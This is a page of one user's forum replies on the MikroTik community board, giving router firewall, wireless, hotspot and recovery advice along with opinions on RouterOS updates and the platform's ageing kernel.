SYN cookies do not do anything to protect against volumetric attacks, they are intended to protect a listening service from spoofed source IPs. Replace your SYN traffic with any other packet flood and you will likely see similar behavior assuming enough bandwidth between attacker and router. You can...
by R1CH
Mon Jan 14, 2019 10:57 pm
Forum: General
Topic: Tower Cabling Choice?
Replies: 4
Views: 442

Re: Tower Cabling Choice?

Shielding / UV resistance is probably more important for outdoor use. Ubiquiti have a product which looks good: https://www.ui.com/accessories/toughcable/
by R1CH
Sat Jan 12, 2019 9:05 pm
Forum: General
Topic: Drop Rules and Packet Count
Replies: 3
Views: 339

Re: Drop Rules and Packet Count

Yes, VLANs are considered their own interfaces and are filtered independently of the interface to which they're connected. You can filter by physical ports using the in / out bridge port options.
by R1CH
Fri Jan 11, 2019 4:18 pm
Forum: General
Topic: Mikrotik's demo system demo.mt.lv firewall Virus rules, worth using???
Replies: 7
Views: 873

Re: Mikrotik's demo system demo.mt.lv firewall Virus rules, worth using???

For forward chain it maybe makes a bit of sense to block new connections to these ports, however most of these are no longer active threats and you risk blocking legitimate services (eg cloud services that pick ephemeral ports). The only ones I use on my network are blocking leaky SMB (137-139,445) ...
by R1CH
Thu Jan 10, 2019 8:06 pm
Forum: RouterBOARD hardware
Topic: Higher-end PWR-Line AP
Replies: 1
Views: 401

Re: Higher-end PWR-Line AP

Would be indeed nice, the fact that the current devices only do 2.4 GHz is an immediate non-starter for me.
by R1CH
Wed Jan 09, 2019 2:45 pm
Forum: Announcements
Topic: v6.42.11 [long-term] is released!
Replies: 42
Views: 8704

Re: v6.42.11 [long-term] is released!

Tried to update to 6.42.11 from 6.42.9 on a hEX using "Download and install", then realized I needed to check something so hit Cancel at about 90% downloaded. I then tried "Download and install" later and it says "not enough disk space" and there's no files available to delete. How do I delete this...
by R1CH
Wed Jan 09, 2019 12:41 pm
Forum: Wireless Networking
Topic: High ping to router HAP AC2
Replies: 33
Views: 2296

Re: High ping to router HAP AC2

Make sure you're configuring / connecting to wlan2 (5 GHz), 2.4 GHz is too noisy for reliable connections.
by R1CH
Tue Jan 08, 2019 5:20 pm
Forum: General
Topic: firewall rules
Replies: 18
Views: 1427

Re: firewall rules

A default drop is generally much better than adding lots of other rules for port scans, address filters, weird TCP flags etc. On embedded devices like routerboards you have limited CPU time; having lots of filter rules running on each packet opens you up to a resource exhaustion DoS.
by R1CH
Mon Jan 07, 2019 3:55 pm
Forum: General
Topic: add it to wishlist - Multicore support for bandwidth test in ROS
Replies: 2
Views: 310

Re: add it to wishlist - Multicore support for bandwidth test in ROS

It's generally better to use iperf instead.
by R1CH
Thu Jan 03, 2019 2:20 pm
Forum: General
Topic: Open Facebook messenger from hotspot after login
Replies: 2
Views: 337

Re: Open Facebook messenger from hotspot after login

The iOS hotspot login page is presented in a modified browser window that for security reasons does not support redirecting to app protocol handlers. Perhaps try directing to a web based version of messenger, since you have no guarantees anyone even has it installed.
by R1CH
Thu Jan 03, 2019 2:07 pm
Forum: General
Topic: VLAN is to complicated
Replies: 21
Views: 1748

Re: VLAN is to complicated

I agree, VLAN support is very messy. It would be nice if, when configuring a software VLAN, RouterOS would just enable hardware offloading like it does for a bridge. Having both hardware and software VLAN configurations mixed together gets very confusing.
by R1CH
Thu Jan 03, 2019 1:13 pm
Forum: General
Topic: Should MikroTik make more powerful antennas and wireless protocols in 2019?
Replies: 19
Views: 1468

Re: Should MikroTik make more powerful antennas and wireless protocols in 2019?

You know that we will not see new kernel on current RBs? Update actual RBs or make new ones with new kernel, better hardware and so on, what's the best choice for MK that is selling their products? Come on, it's not so different than smartphones. I don't see why not, there isn't that much hardware ...
by R1CH
Thu Jan 03, 2019 12:25 am
Forum: General
Topic: Hacked Board
Replies: 15
Views: 1491

Re: Hacked Board

Changing passwords is not enough, you MUST netinstall any compromised device!
by R1CH
Wed Jan 02, 2019 5:53 pm
Forum: General
Topic: Should MikroTik make more powerful antennas and wireless protocols in 2019?
Replies: 19
Views: 1468

Re: Should MikroTik make more powerful antennas and wireless protocols in 2019?

As other posters have said, new antennas and protocols don't mean anything when we're still forced to use a six year old kernel with a hacked-together wifi driver that barely supports any modern features. I want an up to date kernel and non-proprietary wifi drivers far more than I want new antennas ...
by R1CH
Wed Jan 02, 2019 5:49 pm
Forum: General
Topic: Hacked Board
Replies: 15
Views: 1491

Re: Hacked Board

They have enabled packet sniffer to send all passwords, bitcoin private keys, etc to their server. You should format and netinstall with a known good config, once a board is compromised it cannot be safely restored from winbox / terminal alone since a root exploit could have been used.
by R1CH
Mon Dec 31, 2018 8:34 pm
Forum: General
Topic: under attack in port 32231? - help
Replies: 25
Views: 1627

Re: under attack in port 32231? - help

Imagine an attacker is sending a small flood of 10mbps; they are TCP packets with spoofed IPs, so your address list is filling up at a rate of 10k+ unique addresses per second, which increases memory and CPU usage. Without the rule, the packets would be dropped with no additional overhead.
by R1CH
Mon Dec 31, 2018 4:39 pm
Forum: General
Topic: under attack in port 32231? - help
Replies: 25
Views: 1627

Re: under attack in port 32231? - help

Such rules open you up to resource exhaustion DoS and offer very little protection over a default drop. I would not recommend them.
by R1CH
Mon Dec 31, 2018 4:36 pm
Forum: Announcements
Topic: v6.43.8 [stable] is released!
Replies: 169
Views: 32917

Re: v6.43.8 [stable] is released!

!) telnet - do not allow to set "tracefile" parameter;
After some digging, it turns out this is actually to fix an exploit that enables privilege escalation to root or damage to system files. Why is this not labelled as a security fix?

https://cxsecurity.com/issue/WLB-2018120151
by R1CH
Mon Dec 31, 2018 2:20 am
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

You can indeed TCP proxy a HTTPS connection, eg force google.com to resolve to 1.2.3.4 and then proxy 1.2.3.4:443 -> google.com:443. This does not allow you to redirect or do anything else to it though. If you tried to proxy 1.2.3.4:443 -> myhotspot.com:443, the browser would terminate the connectio...
by R1CH
Mon Dec 31, 2018 1:09 am
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

I'm not talking about a session takeover. In a corporate environment where you can control every device then yes, you can intercept and redirect HTTPS by installing a MITM root cert. However people running a Mikrotik Hotspot are unlikely to be in such an environment, otherwise they would be using EAP / 802...
by R1CH
Sun Dec 30, 2018 11:32 pm
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

They are all wrong. If it was possible to intercept and redirect HTTPS, then what's to stop anyone intercepting online banking and other secure sites?

The wiki article only gives steps for making your hotspot login page HTTPS compliant. This has nothing to do with intercepting HTTPS requests.
by R1CH
Sun Dec 30, 2018 5:22 pm
Forum: General
Topic: how to drop udp attack without port in mikrotik?
Replies: 3
Views: 443

Re: how to drop udp attack without port in mikrotik?

Those are fragments. It looks like you are being attacked by a reflected DNS DDoS amplification attack, there isn't much you can do about it as by the time you could block it it's already consumed your bandwidth. You should also ensure you have correct firewall rules to make sure you aren't actually...
by R1CH
Sun Dec 30, 2018 5:15 pm
Forum: General
Topic: under attack in port 32231? - help
Replies: 25
Views: 1627

Re: under attack in port 32231? - help

All you need is a rule at the end of the input chain with action=drop, with your allow rules before it. Stop trying to be fancy with specific ports, TCP scanners, address lists, etc. These offer no additional benefit over a simple drop rule and actually increase resource usage and open you up to DoS.
by R1CH
Sun Dec 30, 2018 5:12 pm
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

This is NOT POSSIBLE, don't waste your time trying.
by R1CH
Mon Dec 17, 2018 12:19 pm
Forum: General
Topic: IP Cloud question
Replies: 26
Views: 1397

Re: IP Cloud question

If you use an old RouterOS version, the service no longer works. Make sure to update your RouterOS, stop the IP cloud service then start it again.

EDIT: Actually it seems like a service outage, ns1.kissthenet.net and ns2.kissthenet.net are both failing.
by R1CH
Fri Dec 14, 2018 2:07 pm
Forum: RouterBOARD hardware
Topic: CCR1009-8G-1S-1S+ Can't get more than 350-450 Mbps single session, can get more with multiple sessions
Replies: 10
Views: 1199

Re: CCR1009-8G-1S-1S+ Can't get more than 350-450 Mbps single session, can get more with multiple sessions

I had a similar issue; disabling queues / enabling fasttrack helped for me though. I think the problem is the RouterOS kernel is too old to support proper balancing of connections across multiple cores, hopefully this is fixed if / when RouterOS v7 comes out. 350 mbps does seem on the low side though...
by R1CH
Wed Dec 12, 2018 7:23 pm
Forum: General
Topic: hAp ac^2: inferior LAN-to-LAN performance when HW offloading is used
Replies: 5
Views: 517

Re: hAp ac^2: inferior LAN-to-LAN performance when HW offloading is used

I vaguely recall reading something about how mixed speeds cause the switch chip to have to flush buffers before processing a new packet. It's best to put a cheap gigabit switch in front of the device to handle mixed speed devices so only 1gbps devices are connected directly.
by R1CH
Wed Dec 12, 2018 7:20 pm
Forum: General
Topic: Mikrotik Port Scanner -> Filezilla (21) Problem
Replies: 7
Views: 639

Re: Mikrotik Port Scanner -> Filezilla (21) Problem

FTP opens many connections (1 per file), you should make sure your PSD rules are not running if a connection is allowed. It's also very questionable to do anything with PSD since you have no guarantees the IPs you are adding to your lists aren't spoofed.
by R1CH
Tue Dec 11, 2018 1:18 am
Forum: RouterBOARD hardware
Topic: hardware idea for a multiport switch
Replies: 40
Views: 7256

Re: hardware idea for a multiport switch

I agree with the others. 48 port switches / patch panels already have very thick cable bundles, this would be a nightmare to manage cable-wise.
by R1CH
Mon Dec 10, 2018 7:57 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

Really happy with the performance on this device, replaced an aging RB951G that had to use fasttrack and the 4011 handles our 500mbps internet with traffic shaping and IPv6 tunnels with only 25% CPU usage. Only thing I want now is root to install DNSCrypt proxy - anyone found a nice way to root thi...
by R1CH
Fri Dec 07, 2018 11:39 pm
Forum: General
Topic: Supplier requires Iperf Speedtest program
Replies: 8
Views: 667

Re: Supplier requires Iperf Speedtest program

You should always be doing tests "through" the router, the CPUs on the devices are not optimized for generating traffic. Port forwarding is simple enough, iperf only requires a single port or can reverse-connect to an available server.
by R1CH
Fri Dec 07, 2018 11:37 pm
Forum: General
Topic: DNS Flood
Replies: 5
Views: 736

Re: DNS Flood

This image was for 1 second, the client generates that amount several times, figuring out further to find out his CPE was "hacked". But I would like to know about this traffic before it gets worse, in this case I redirected the client to a secondary DNS That's still well within the realm of normal ...
by R1CH
Fri Dec 07, 2018 8:47 pm
Forum: General
Topic: DNS Flood
Replies: 5
Views: 736

Re: DNS Flood

This looks like normal traffic, DNS resolvers use a new socket for every resolution as an added protection against DNS spoofing. I would not consider 28kbps a "flood".
by R1CH
Wed Dec 05, 2018 5:03 pm
Forum: Wireless Networking
Topic: cap AC Critical Errors???
Replies: 9
Views: 896

Re: cap AC Critical Errors???

Either they are not receiving enough power or the power is not good quality. If you're sure the power source is good and they are running the latest firmware and RouterOS then the device is probably defective.
by R1CH
Wed Dec 05, 2018 5:01 pm
Forum: Wireless Networking
Topic: hAPac2 wifi issue [SOLVED]
Replies: 6
Views: 813

Re: hAPac2 wifi issue [SOLVED]

If you're only bothered by the log entry you can turn off the "info" category if you don't want to see this.
by R1CH
Wed Dec 05, 2018 1:53 pm
Forum: Wireless Networking
Topic: hAPac2 wifi issue [SOLVED]
Replies: 6
Views: 813

Re: hAPac2 wifi issue [SOLVED]

This usually means the client is using the wrong WPA2 key.
by R1CH
Sat Dec 01, 2018 10:28 pm
Forum: General
Topic: speedtets using 1 core [SOLVED]
Replies: 7
Views: 546

Re: speedtets using 1 core [SOLVED]

This is a known issue with RouterOS v6. Something to do with the kernel / connection tracking most likely.

See also viewtopic.php?t=131503
by R1CH
Fri Nov 30, 2018 12:04 am
Forum: General
Topic: CoDel support?
Replies: 45
Views: 13276

Re: CoDel support?

No new kernel, so no update. Probably need to wait for RouterOS v7 or move to a different platform if you want this.
by R1CH
Fri Nov 30, 2018 12:03 am
Forum: General
Topic: wifi showing OS version to scanner
Replies: 3
Views: 402

Re: wifi showing OS version to scanner

I also want this to be optional. viewtopic.php?f=7&t=133186
by R1CH
Fri Nov 30, 2018 12:01 am
Forum: General
Topic: SSl Certificat For Mikrotik
Replies: 13
Views: 835

Re: SSl Certificat For Mikrotik

Nothing is being redirected, it's entirely up to the browser or OS. The browser sees a HTTPS loading error, tries to load a HTTP URL and notices if there was a redirect. If so, it assumes there is a portal and offers the sign in option. Since the "HTTPS error" is technically an attack, some bigger s...
by R1CH
Thu Nov 29, 2018 11:58 pm
Forum: General
Topic: Improving hotspot/captive portal detection?
Replies: 3
Views: 620

Re: Improving hotspot/captive portal detection?

Those systems work by seeing a HTTPS error, then trying to access a normal HTTP URL. If the HTTP request is redirected, they assume a portal is in use. As long as you're redirecting everything, you should see the same behavior with the Mikrotik hotspot.
by R1CH
Wed Nov 28, 2018 6:05 pm
Forum: General
Topic: SSl Certificat For Mikrotik
Replies: 13
Views: 835

Re: SSl Certificat For Mikrotik

If your device / browser won't detect the portal automatically, then yes, you need to open a non-HTTPS site to get the portal redirect. Most modern browsers and devices do this automatically in the background though when you connect to a new network. There is NO WAY to redirect a HTTPS site!
by R1CH
Mon Nov 26, 2018 4:58 pm
Forum: General
Topic: Improving hotspot/captive portal detection?
Replies: 3
Views: 620

Re: Improving hotspot/captive portal detection?

There is no system that works with HTTPS*. This is by design, if you could intercept a secure page to show your portal, so could anyone else. The only thing you need to do is redirect ALL requests to your hotspot page, even those without a valid hostname (eg http://sdfnsdgnsseg). When a phone / brow...
by R1CH
Fri Nov 23, 2018 8:05 pm
Forum: General
Topic: Mikrotik SSH Vulnerability 6.14+
Replies: 4
Views: 537

Re: Mikrotik SSH Vulnerability 6.14+

It looks like the researcher has retracted their claim. The only remaining issue is that the sshd supports a "null" cipher, which isn't secure - but you have to explicitly ask for it.

https://twitter.com/hackerfantastic/sta ... 9068090369
by R1CH
Fri Nov 23, 2018 5:54 pm
Forum: General
Topic: Hotspot Landing Page
Replies: 3
Views: 665

Re: Hotspot Landing Page

This is intentional behavior - you cannot redirect HTTPS sites to your landing page. Properly configured phones, laptops etc will detect the presence of the portal and redirect users automatically. Make sure your regular HTTP requests are redirecting and you should be fine.
by R1CH
Fri Nov 23, 2018 4:13 pm
Forum: General
Topic: Router Blocking Connections
Replies: 2
Views: 382

Re: Router Blocking Connections

Your blocklist is blocking most of the internet, which is why ping / winbox is not working.
by R1CH
Fri Nov 23, 2018 4:11 pm
Forum: General
Topic: SSl Certificat For Mikrotik
Replies: 13
Views: 835

Re: SSl Certificat For Mikrotik

For the hotspot login page itself, this is possible. For redirecting clients to the hotspot, this is not possible.
by R1CH
Fri Nov 23, 2018 4:05 pm
Forum: General
Topic: Mikrotik SSH Vulnerability 6.14+
Replies: 4
Views: 537

Mikrotik SSH Vulnerability 6.14+

https://twitter.com/hackerfantastic/status/1065838886989922305 Once again, Mikrotik's custom implementation (instead of a well-tested open source version) has introduced a security flaw: The take-away from this is that an attacker could perform a MITM attack against *any* Mikrotik router during the ...
by R1CH
Thu Nov 22, 2018 2:18 am
Forum: Wireless Networking
Topic: Open Wireless network No.2
Replies: 2
Views: 331

Re: Open Wireless network No.2

Set a "none" security profile.
by R1CH
Mon Nov 19, 2018 3:58 pm
Forum: General
Topic: Management high CPU on lots of Mikrotiks today - DDoS??
Replies: 15
Views: 1045

Re: Management high CPU on lots of Mikrotiks today - DDoS??

You clearly don't have a secure firewall if this traffic is able to reach your router. Rather than locking down only management services, you should block all unknown traffic by default. As for the IP - you are actually being used to cause a DDoS against this company. Someone is spoofing the IP of t...
by R1CH
Fri Nov 16, 2018 3:01 pm
Forum: General
Topic: DNS Server IPs disappears abruptly from Hotspot
Replies: 2
Views: 292

Re: DNS Server IPs disappears abruptly from Hotspot

Add them manually? It sounds like they're being sourced from DHCP and then the server is randomly not assigning them for whatever reason.
by R1CH
Fri Nov 16, 2018 2:11 am
Forum: General
Topic: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range
Replies: 6
Views: 607

Re: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range

The clients will get a cert warning because it is very likely that your client request will not match the request (unless they directly went to a URI that matches the Apache server name). As soon as they click through the cert warning you'll be up and running. You can then redirect them to a URI th...
by R1CH
Thu Nov 15, 2018 1:34 am
Forum: Wireless Networking
Topic: RB951G-2HnD (6.43) - connect to internet without cables
Replies: 3
Views: 400

Re: RB951G-2HnD (6.43) - connect to internet without cables

See https://wiki.mikrotik.com/wiki/Manual:I ... s#Repeater

I would not recommend doing this without a wired connection during configuration though.
by R1CH
Thu Nov 15, 2018 1:27 am
Forum: General
Topic: [Request] Add "DNS over HTTPS" to RouterOS (Internet security protocols)
Replies: 13
Views: 2459

Re: [Request] Add "DNS over HTTPS" to RouterOS (Internet security protocols)

I've been using DNS over HTTPS on a rooted RB951 and it's been flawless. No timeouts, no perceptible latency increase and the additional security it brings is very nice. Hopefully this makes it into RouterOS v7.
by R1CH
Thu Nov 15, 2018 1:25 am
Forum: General
Topic: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range
Replies: 6
Views: 607

Re: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range

For HTTP sure, just DNAT them to your webserver. There is no way to do this for HTTPS though.
by R1CH
Thu Nov 15, 2018 1:23 am
Forum: General
Topic: TWO CCRs FULLY UPGRADED AND STILL EXPLOITED (ROOTED) [SOLVED]
Replies: 16
Views: 1574

Re: TWO CCRs FULLY UPGRADED AND STILL EXPLOITED (ROOTED) [SOLVED]

You should always netinstall after a compromise. Mikrotik have stated that there are ways to get OS root access once you have winbox access, so processes at that point aren't visible to RouterOS - even after upgrading there may be a persistent backdoor. Formatting / netinstall is the only safe way (...
by R1CH
Sun Nov 11, 2018 8:23 pm
Forum: Wireless Networking
Topic: Problem with wAP AC
Replies: 7
Views: 796

Re: Problem with wAP AC

You've got some misconfigured IPs there for your WAN and LAN connections. First, they shouldn't be the same IP or the router won't know which interface to use, and secondly you have a /8 subnet on the WAN, that certainly can't be right. I'm not sure what your intended configuration is supposed to be...
by R1CH
Fri Nov 09, 2018 4:10 pm
Forum: Announcements
Topic: Newsletter 85
Replies: 30
Views: 9750

Re: Newsletter 85

Good luck getting 150mbps from a 2.4 GHz network that's not even inside the building!
by R1CH
Fri Nov 09, 2018 4:06 pm
Forum: General
Topic: Management Network for router access?
Replies: 10
Views: 778

Re: Management Network for router access?

On one of my bigger networks I have a dedicated management VLAN. RouterOS is firewalled on every interface except this VLAN, so it only performs routing. I have a Linux box on the management network running wireguard that allows me to remote in, I trust wireguard far more than any of the RouterOS VP...
by R1CH
Fri Nov 09, 2018 3:15 pm
Forum: Announcements
Topic: Newsletter 85
Replies: 30
Views: 9750

Re: Newsletter 85

The device could also be used in places where the signal is just average, in order to boost a low speed into 100mbps+ throughput. Only having an FE port already kills this use case though. There's really no reason why devices that have 100mbps+ possible on the radio side are still shipping with FE p...
by R1CH
Thu Nov 08, 2018 6:42 pm
Forum: RouterBOARD hardware
Topic: Qualcomm IPQ8074
Replies: 7
Views: 2767

Re: Qualcomm IPQ8074

Another 11ax product just launched now, putting indeed some pressure on having 11ax products to use. Mechanical design is more questionable, but that can easily be changed (and I like the plane/rocket style of the RAX120, it has a big WOW factor). https://www.netgear.com/home/products/networking/wi...
by R1CH
Tue Nov 06, 2018 4:06 pm
Forum: Announcements
Topic: Newsletter 85
Replies: 30
Views: 9750

Re: Newsletter 85

Was hoping for some 802.11ax news... really hope there's something coming soon!
by R1CH
Mon Nov 05, 2018 6:24 pm
Forum: General
Topic: Firmware upgrade?
Replies: 3
Views: 393

Re: Firmware upgrade?

This is an unfortunate side effect of the new firmware version scheme. The firmware version always shows the same as RouterOS version now, even if there have been no changes between the previous firmware version. The only way to know for sure if there's really been an update is to read through chang...
by R1CH
Mon Nov 05, 2018 6:20 pm
Forum: RouterBOARD hardware
Topic: FTTH FIBER 200MB
Replies: 4
Views: 751

Re: FTTH FIBER 200MB

At that speed you should make sure fasttrack is working, I have 500mbps with fasttrack no problems.
by R1CH
Sat Nov 03, 2018 12:51 am
Forum: General
Topic: PB HTTPS (SSL) on Hotspots : Urgent
Replies: 2
Views: 291

Re: PB HTTPS (SSL) on Hotspots : Urgent

Abandon your quest! As long as you aren't whitelisting the connectivity test domains used by modern devices and browsers, they will pop up the captive portal login automatically. Trying to intercept HTTPS requests is impossible, if you could do it then so could anyone on the network (internet), defe...
by R1CH
Wed Oct 31, 2018 6:13 pm
Forum: General
Topic: Strange loop on update from 6.37.3 to 6.43.4
Replies: 5
Views: 580

Re: Strange loop on update from 6.37.3 to 6.43.4

Given the severity of the exploits, it's best to netinstall with a known good config. System level access allows attackers to install malware that isn't visible to RouterOS / winbox.
by R1CH
Wed Oct 31, 2018 1:25 pm
Forum: Wireless Networking
Topic: wpa3
Replies: 5
Views: 1252

Re: wpa3

Qualcomm even shared that the WPA3 security features will be incorporated in its chipsets for mobile devices starting with the Snapdragon 845 mobile platform in June 2018. WPA3 will be supported on all Qualcomm Access Point platforms by July 2018. Doesn't seem like this should require hardware supp...
by R1CH
Wed Oct 31, 2018 1:19 pm
Forum: General
Topic: Old kernel. Why?
Replies: 5
Views: 701

Re: Old kernel. Why?

One of the issues is that Mikrotik wrote a lot of their own proprietary kernel modules, they likely aren't compatible with newer kernels. It's a shame as a lot of the included drivers with newer kernels are much higher quality than Mikrotik's implementations (eg the QCA driver supports Wave 2 802.11...
by R1CH
Mon Oct 29, 2018 6:29 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 631

Re: Advanced IP scanners locks up winbox access?

I ended up power cycling which resolved the issue (for now). Very strange, hopefully this doesn't happen to routers I don't have physical access to!
by R1CH
Mon Oct 29, 2018 6:28 pm
Forum: General
Topic: MikroTik and SSL website (Comodo)
Replies: 5
Views: 573

Re: MikroTik and SSL website (Comodo)

Have you set MTU appropriately and enabled PMTU clamping if necessary?
by R1CH
Mon Oct 29, 2018 6:27 pm
Forum: General
Topic: Performance problems with CRS112-8P-4S
Replies: 4
Views: 1237

Re: Performance problems with CRS112-8P-4S

The "S" in CRS112-8P-4S stands for SWITCH. Stop trying to use it as a router and you won't have these problems.

the switching power seems to be ok, the connected computers can send and receive with the full bandwith of 1GBit.
by R1CH
Sun Oct 28, 2018 3:24 pm
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 16962

Re: CloudFlare DNS over TLS

Not sure, supposedly the update process wipes out any non-standard files so I'm not going to update until I have a very good reason to. I imagine Mikrotik will silently patch the jailbreak so I don't know how long this will be possible.
by R1CH
Fri Oct 26, 2018 7:03 pm
Forum: General
Topic: DHCP Rebinding Issue - stuck in rebinding until lease times out
Replies: 3
Views: 520

Re: DHCP Rebinding Issue - stuck in rebinding until lease times out

I've also seen this behavior at times. The Mikrotik DHCP client seems to have no end of little quirks and bugs like this, I wish we could just use udhcp which comes as part of busybox, it's well tested and should handle these kinds of cases much better.
by R1CH
Fri Oct 26, 2018 5:50 pm
Forum: General
Topic: How recovery hacked RB2011 via JTAG ?
Replies: 3
Views: 590

Re: How recovery hacked RB2011 via JTAG ?

Why can you not netinstall?
by R1CH
Fri Oct 26, 2018 5:49 pm
Forum: General
Topic: Firewall rules not working after hacker infection
Replies: 3
Views: 474

Re: Firewall rules not working after hacker infection

You should netinstall with a known good config. Once a router is compromised an attacker can get system level access that you cannot detect or repair from the RouterOS UI.
by R1CH
Thu Oct 25, 2018 5:51 pm
Forum: General
Topic: firewall [SOLVED]
Replies: 5
Views: 658

Re: firewall [SOLVED]

Be aware that the default config in the latest "stable" version has no firewall either.

viewtopic.php?f=2&t=140661
by R1CH
Thu Oct 25, 2018 5:50 pm
Forum: General
Topic: Established connection question
Replies: 3
Views: 401

Re: Established connection question

These are connections to a service on your router. If you don't recognize them, your router might be compromised and running backdoor PPTP services, web proxy, SOCKS, etc.
by R1CH
Wed Oct 24, 2018 3:42 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 879

Re: Port Scan Drop ?

Port scan does not use established connections. If you're using a detect-and-block script, then the attacker can just scan you with a fake IP of Google, Facebook, DNS server, etc. and suddenly you've blocked important services. Relying on a hidden port for security is not good, best to use a VPN o...
by R1CH
Wed Oct 24, 2018 2:25 pm
Forum: General
Topic: Missing default config after reset
Replies: 3
Views: 350

Re: Missing default config after reset

The default config was broken in the latest releases.

viewtopic.php?f=2&t=140661
by R1CH
Wed Oct 24, 2018 1:43 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 879

Re: Port Scan Drop ?

Best practice says you should drop all unknown input, there's no need to make rules specifically for port scanners.
by R1CH
Wed Oct 24, 2018 12:44 pm
Forum: General
Topic: Default configuration is broken?
Replies: 5
Views: 736

Re: Default configuration is broken?

QA on updates is getting quite poor lately. How does a change like this even happen to a "bugfix only" branch?
by R1CH
Tue Oct 23, 2018 4:21 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 631

Re: Advanced IP scanners locks up winbox access?

No RADIUS / user manager or anything for me, just a simple SOHO setup.
by R1CH
Tue Oct 23, 2018 2:02 pm
Forum: RouterBOARD hardware
Topic: New High End Router Hardware Soon?
Replies: 11
Views: 1783

Re: New High End Router Hardware Soon?

Since TILE is a dead architecture in the Linux kernel there needs to be a high end model that will handle RouterOS v7 (if it ever comes out). I am worried more and more about how old the RouterOS v6 kernel is, many modern chipsets (both CPU and wireless etc) require newer kernels so the available ha...
by R1CH
Tue Oct 23, 2018 1:59 pm
Forum: RouterBOARD hardware
Topic: HAP AC2 Availability in the US
Replies: 11
Views: 1833

Re: HAP AC2 Availability in the US

I notice even EuroDK no longer has hAP AC2 in stock. Is there some kind of problem with the board that halted production?
by R1CH
Tue Oct 23, 2018 1:56 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 631

Re: Advanced IP scanners locks up winbox access?

I wonder if I'm experiencing the same issue. I'm locked out of winbox, webfig, mac-telnet and SSH on one of my routers, if I enter an incorrect username or password I immediately get a negative response, with the correct password the connection hangs for about a minute then says "Incorrect password".
by R1CH
Tue Oct 23, 2018 12:59 pm
Forum: General
Topic: How can I distinguish different certificate in Winbox?
Replies: 1
Views: 201

Re: How can I distinguish different certificate in Winbox?

Modern versions of RouterOS use the SRP protocol to avoid MITM. Prior to this, there was no host verification so MITM was easy.

https://en.wikipedia.org/wiki/Secure_Re ... d_protocol
by R1CH
Mon Oct 22, 2018 1:06 am
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 16962

Re: CloudFlare DNS over TLS

I've got DNS over TLS working on my hEX! If you've rooted your device (don't contact MT for support if you do this!) it's quite straightforward to install. Since cloudflared is written in Go, it's easy to cross-compile and the only thing it needs to operate is a ca-certificates.crt bundle which I co...
by R1CH
Tue Oct 16, 2018 2:22 pm
Forum: RouterBOARD hardware
Topic: Qualcomm IPQ8074
Replies: 7
Views: 2767

Re: Qualcomm IPQ8074

Given how long it took for 802.11ac (which still isn't fully implemented!), I think it will be 2020 or later before Mikrotik come out with 802.11ax products :(.
by R1CH
Tue Oct 16, 2018 1:33 am
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2963

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

Finally had some time to play around with this. It works very well and there is almost zero risk of bricking your device. Can't wait to start experimenting with custom software on my router at last!
by R1CH
Fri Oct 12, 2018 5:28 pm
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2963

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

I wish there were an official way to do this rather than relying on tools that potentially cause issues or stop working in the future. Installing wireguard for example or proper openvpn with UDP support would be so useful.
by R1CH
Wed Oct 10, 2018 6:19 pm
Forum: General
Topic: Limiting ICMP on input chain
Replies: 3
Views: 913

Re: Limiting ICMP on input chain

Reminder that ICMP source addresses can be spoofed, adding addresses to a blacklist without being able to verify the source address is a bad practice. It's better to just rate limit (which is built into the kernel - check IP / Settings).
by R1CH
Wed Oct 10, 2018 1:15 pm
Forum: General
Topic: Can't Upgrade router mikrotik because hacked
Replies: 7
Views: 2113

Re: Can't Upgrade router mikrotik because hacked

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.
by R1CH
Tue Oct 09, 2018 12:19 am
Forum: RouterBOARD hardware
Topic: Improove capacitor quality
Replies: 3
Views: 862

Re: Improove capacitor quality

How are we still having failing capacitors in 2018?!
by R1CH
Mon Oct 08, 2018 10:38 pm
Forum: General
Topic: CVE-2018-1156 and Winbox exploit
Replies: 0
Views: 674

CVE-2018-1156 and Winbox exploit

There are quite a few blogs going around today which make it sound like there is some new Mikrotik exploit. It's not a new exploit, but discussions about the combination of the already patched winbox exploit + the already patched CVE-2018-1156 format string exploit. If a router is vulnerable to the w...
by R1CH
Mon Oct 08, 2018 1:04 pm
Forum: General
Topic: Router is infection by virus coinhive
Replies: 4
Views: 6477

Re: Router is infection by virus coinhive

Updating RouterOS won't magically remove bad parts of your configuration, it only prevents future exploits (assuming you changed your passwords). It's up to you to disinfect the router, the recommended way is to netinstall with a known good config, otherwise export the config, reset to default then ...
by R1CH
Sat Oct 06, 2018 5:09 pm
Forum: General
Topic: Unable to get full gigabit speed on RB750Gr3
Replies: 28
Views: 3828

Re: Unable to get full gigabit speed on RB750Gr3

Most likely the device is not powerful enough; check system / resources while testing to see the CPU usage.
by R1CH
Fri Oct 05, 2018 2:54 pm
Forum: Wireless Networking
Topic: IPQ4019 chipsets - random capacity loss
Replies: 8
Views: 1186

Re: IPQ4019 chipsets - random capacity loss

Many devices from other manufacturers use the IPQ401x chipset without issue. I suspect the problem is more to do with Mikrotik's proprietary driver than the ARM platform itself.
